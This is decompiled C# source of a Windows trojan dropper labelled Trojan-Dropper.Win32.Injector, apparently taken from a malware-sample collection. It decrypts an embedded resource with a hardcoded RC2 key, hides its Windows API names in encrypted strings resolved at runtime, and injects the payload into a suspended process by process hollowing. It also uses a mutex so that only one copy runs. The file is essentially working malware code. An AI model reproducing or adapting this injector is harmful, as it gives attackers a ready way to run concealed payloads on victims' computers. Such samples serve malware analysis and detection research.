MalwareSourceCode/MSIL/Trojan-Dropper/Win32/I/Trojan-Dropper.Win32.Injector.oif-6c38ff7447d62661b0227594bb34a43fd9e95cc53db7c375cb079d41ef678d22/Â4g̵Ò.cs
2022-08-18 06:28:56 -05:00

246 lines
9.4 KiB
C#

// Decompiled with JetBrains decompiler
// Type: Â4g̵Ò
// Assembly: bbsx3kxh, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: FF3146BD-161B-4924-BABD-AF97B1A59012
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Injector.oif-6c38ff7447d62661b0227594bb34a43fd9e95cc53db7c375cb079d41ef678d22.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
[StandardModule]
internal sealed class Â4g̵Ò
{
private static DateTime roy = DateTime.Now;
[DllImport("irprops", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern long wjØÜÙ5(Decimal Ø0ÆÜÏ, float ÿÂ, [MarshalAs(UnmanagedType.VBByRefStr)] ref string ÙÂÄi, int nÖÁs, int Þ);
public static byte[] Ú(byte[] ÖÓ, ulong ÂÞÖ)
{
byte[] numArray = new byte[15]
{
(byte) 148,
(byte) 74,
(byte) 150,
(byte) 90,
(byte) 73,
(byte) 141,
(byte) 130,
(byte) 53,
(byte) 227,
(byte) 101,
(byte) 78,
(byte) 143,
(byte) 151,
(byte) 168,
(byte) 55
};
using (RC2CryptoServiceProvider cryptoServiceProvider = new RC2CryptoServiceProvider())
{
Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(numArray, numArray, 1);
int num1 = true ? 1 : 0;
cryptoServiceProvider.Key = rfc2898DeriveBytes.GetBytes((int) Math.Round((double) cryptoServiceProvider.KeySize / 8.0));
int num2 = true ? 1 : 0;
cryptoServiceProvider.IV = rfc2898DeriveBytes.GetBytes((int) Math.Round((double) cryptoServiceProvider.BlockSize / 8.0));
return cryptoServiceProvider.CreateDecryptor().TransformFinalBlock(ÖÓ, 0, ÖÓ.Length);
}
}
public static string ÎtÊkÏ(sbyte x0Îß, string Æy9, byte p0j59Ë) => Encoding.UTF8.GetString(Â4g̵Ò.Ú(Convert.FromBase64String(Æy9), 2079907628UL));
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string À);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr À, [MarshalAs(UnmanagedType.VBByRefStr)] ref string ÆØÎÓÍi);
public static ÆØÎÓÍi À<ÆØÎÓÍi>(string ÀÆ4th) => (ÆØÎÓÍi) Marshal.GetDelegateForFunctionPointer(Â4g̵Ò.GetProcAddress(Â4g̵Ò.LoadLibraryA(ref ÀÆ4th.Split(Convert.ToChar(58))[0]), ref ÀÆ4th.Split(Convert.ToChar(58))[1]), typeof (ÆØÎÓÍi));
public static void ÍÔÚÆ4Ö(sbyte ßq5, byte[] ÍÔÚÆ4Ö, DateTime ÂÜ4vn)
{
int num1 = 0;
do
{
++num1;
}
while (num1 <= 100);
short num2 = 2302;
string Ækÿ1 = Assembly.GetEntryAssembly().Location;
byte num3 = 0;
do
{
int num4 = (int) num3;
while (num4 <= 30 && num4 != 25)
++num4;
++num3;
}
while (num3 <= (byte) 20);
if (Directory.Exists(Conversions.ToString(Environment.SystemDirectory[0]) + Â4g̵Ò.ÎtÊkÏ((sbyte) -16, "pGJxb0xgkIehL44+nj3Q/9x1lEr7/J1M", (byte) 160)))
{
foreach (string directory in Directory.GetDirectories(Conversions.ToString(Environment.SystemDirectory[0]) + Â4g̵Ò.ÎtÊkÏ((sbyte) 0, "IPn3YJa+m5hRy0MfiKSHKcW4u/x8vRHeXlnXHaq4wBdaV4j/b6aXZQ==", (byte) 0)))
{
if (directory.Contains(Â4g̵Ò.ÎtÊkÏ((sbyte) 0, "GY1x7BFYPAg=", (byte) 190)))
{
Ækÿ1 = directory + Â4g̵Ò.ÎtÊkÏ((sbyte) -101, "nMHLqIYdLp7jqju8IneUbA==", (byte) 211);
Guid.NewGuid();
break;
}
++num2;
}
}
byte[] numArray1 = new byte[6]
{
(byte) 0,
(byte) 1,
(byte) 2,
(byte) 3,
(byte) 4,
(byte) 5
};
int[] numArray2 = new int[8]
{
1,
16,
2,
32,
4,
64,
4,
64
};
bool flag1 = false;
int int32 = BitConverter.ToInt32(ÍÔÚÆ4Ö, 60);
int int16 = (int) BitConverter.ToInt16(ÍÔÚÆ4Ö, int32 + 6);
IntPtr qgÅ1 = new IntPtr(BitConverter.ToInt32(ÍÔÚÆ4Ö, int32 + 84));
IntPtr[] q = new IntPtr[4];
IntPtr num5;
if (!Â4g̵Ò.À<Â4g̵Ò.ÙÉ>(Â4g̵Ò.ÎtÊkÏ((sbyte) 86, "AkfNk3cb8FEj8mhR0MvaqFTiDyY1kC65", (byte) 125))((string) null, Ækÿ1, num5, num5, false, 4, num5, (string) null, new byte[0], q))
return;
try
{
flag1 = true;
uint[] Ækÿ2 = new uint[179];
Ækÿ2[0] = 65538U;
if (Â4g̵Ò.À<Â4g̵Ò.ÑÀ>(Â4g̵Ò.ÎtÊkÏ((sbyte) -5, "AkfNk3cb8FHcThQeZcujxt1yReBRDsECGlDssfI1oHc=", (byte) 147))(q[1], Ækÿ2))
{
IntPtr iÌ4_1;
IntPtr Á7xÿßx;
if (Â4g̵Ò.À<Â4g̵Ò.b>(Â4g̵Ò.ÎtÊkÏ((sbyte) -82, "AkfNk3cb8FH7avFy2XdgEvMsHes5Kn4PhPATuavLveE=", (byte) 12))(q[0], new IntPtr((long) Ækÿ2[41] + 8L), ref iÌ4_1, new IntPtr(4), ref Á7xÿßx))
{
if (Â4g̵Ò.À<Â4g̵Ò.g_6nyl>(Â4g̵Ò.ÎtÊkÏ((sbyte) -119, "3pV6uVVnE5WOo9hXjwjtIuY27hF/nopxTKw6Oaxw6jo=", (byte) 157))(q[0], iÌ4_1) == 0U)
{
Â4g̵Ò.v v = Â4g̵Ò.À<Â4g̵Ò.v>(Â4g̵Ò.ÎtÊkÏ((sbyte) -115, "AkfNk3cb8FG4XDtrNYQh6ncBWjrHHpGG", (byte) 128));
IntPtr ÍÔÚÆ4Ö1 = q[0];
IntPtr num6 = new IntPtr(BitConverter.ToInt32(ÍÔÚÆ4Ö, int32 + 52));
IntPtr Ækÿ3 = num6;
IntPtr num7 = new IntPtr(BitConverter.ToInt32(ÍÔÚÆ4Ö, int32 + 80));
IntPtr iÌ4_2 = num7;
IntPtr Ækÿ4 = v(ÍÔÚÆ4Ö1, Ækÿ3, iÌ4_2, 12288, 64);
Â4g̵Ò.ØÄ øä1 = Â4g̵Ò.À<Â4g̵Ò.ØÄ>(Â4g̵Ò.ÎtÊkÏ((sbyte) 72, "AkfNk3cb8FEW+TPPCclD8bWYWAftEoHWMhh1KGWdx2Q=", (byte) 35));
numArray1 = (byte[]) null;
bool flag2 = øä1(q[0], Ækÿ4, ÍÔÚÆ4Ö, qgÅ1, ref Á7xÿßx);
int[] dst1 = new int[10];
int num8 = int16 - 1;
for (int index = 0; index <= num8; ++index)
{
dst1[0] = 15;
dst1[5] = 223 + dst1[0];
Buffer.BlockCopy((Array) ÍÔÚÆ4Ö, int32 + 248 + index * 40, (Array) dst1, 0, 40);
byte[] dst2 = new byte[dst1[4] - 1 + 1];
flag1 = false;
dst1.Length.ToString();
Buffer.BlockCopy((Array) ÍÔÚÆ4Ö, dst1[5], (Array) dst2, 0, dst2.Length);
Â4g̵Ò.ØÄ øä2 = øä1;
IntPtr ÍÔÚÆ4Ö2 = q[0];
num7 = new IntPtr(Ækÿ4.ToInt32() + dst1[3]);
IntPtr Ækÿ5 = num7;
byte[] iÌ4_3 = dst2;
num6 = new IntPtr(dst2.Length);
IntPtr qgÅ2 = num6;
ref IntPtr local = ref Á7xÿßx;
flag2 = øä2(ÍÔÚÆ4Ö2, Ækÿ5, iÌ4_3, qgÅ2, ref local);
}
Â4g̵Ò.ØÄ øä3 = øä1;
IntPtr ÍÔÚÆ4Ö3 = q[0];
num7 = new IntPtr((long) Ækÿ2[41] + 8L);
IntPtr Ækÿ6 = num7;
byte[] bytes = BitConverter.GetBytes(Ækÿ4.ToInt32());
num6 = new IntPtr(4);
IntPtr qgÅ3 = num6;
ref IntPtr local1 = ref Á7xÿßx;
flag2 = øä3(ÍÔÚÆ4Ö3, Ækÿ6, bytes, qgÅ3, ref local1);
Ækÿ2[44] = (uint) (Ækÿ4.ToInt32() + BitConverter.ToInt32(ÍÔÚÆ4Ö, int32 + 40));
int num9 = Â4g̵Ò.À<Â4g̵Ò.ÑÀ>(Â4g̵Ò.ÎtÊkÏ((sbyte) -66, "AkfNk3cb8FEzYHHijFbTn+Bvu/hlKwVIJHW2Tl7CQI0=", (byte) 34))(q[1], Ækÿ2) ? 1 : 0;
flag1 = true;
int num10 = Â4g̵Ò.À<Â4g̵Ò.Ñ7>(Â4g̵Ò.ÎtÊkÏ((sbyte) 0, "AkfNk3cb8FFMOoT7qlSi1WE1Lh7B3VwP", (byte) 161))(q[1]);
return;
}
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
Process.GetProcessById(q[2].ToInt32()).Kill();
}
[STAThread]
public static void Main()
{
if (!new Mutex(false, Â4g̵Ò.ÎtÊkÏ((sbyte) 92, "r8XKtD49yqjBI+4aIG/OWWVanFCpcao5BzrVog0ovWrjymBH2XgD4p6xQf0dyhsY", (byte) 33)).WaitOne(0, false))
ProjectData.EndApp();
Â4g̵Ò.ÍÔÚÆ4Ö((sbyte) -27, Â4g̵Ò.Ú((byte[]) new ResourceManager("5txj2rf4", Assembly.GetExecutingAssembly()).GetObject(Â4g̵Ò.ÎtÊkÏ((sbyte) 113, "eAq5iK8LUXk=", (byte) 82)), 856643351UL), DateTime.Now);
}
public class ÀßdÊbq
{
[DebuggerNonUserCode]
public ÀßdÊbq()
{
}
public delegate double zÏaÔ(sbyte ÛÓ, uint Ë, bool ÉÀjÏr, ulong Äm, string Ào1);
public delegate void ceq64v();
}
public delegate bool ÙÉ(
string ÍÔÚÆ4Ö,
string Ækÿ,
IntPtr iÌ4,
IntPtr qgÅ,
bool Á7xÿßx,
int mÀu,
IntPtr ÖÌ,
string ÿÂÃÚu,
byte[] Ü3,
IntPtr[] q);
public delegate bool ÑÀ(IntPtr ÍÔÚÆ4Ö, uint[] Ækÿ);
public delegate bool b(
IntPtr ÍÔÚÆ4Ö,
IntPtr Ækÿ,
ref IntPtr iÌ4,
IntPtr qgÅ,
ref IntPtr Á7xÿßx);
public delegate uint g_6nyl(IntPtr ÍÔÚÆ4Ö, IntPtr Ækÿ);
public delegate IntPtr v(IntPtr ÍÔÚÆ4Ö, IntPtr Ækÿ, IntPtr iÌ4, int qgÅ, int Á7xÿßx);
public delegate bool ØÄ(IntPtr ÍÔÚÆ4Ö, IntPtr Ækÿ, byte[] iÌ4, IntPtr qgÅ, ref IntPtr Á7xÿßx);
public delegate int Ñ7(IntPtr ÍÔÚÆ4Ö);
}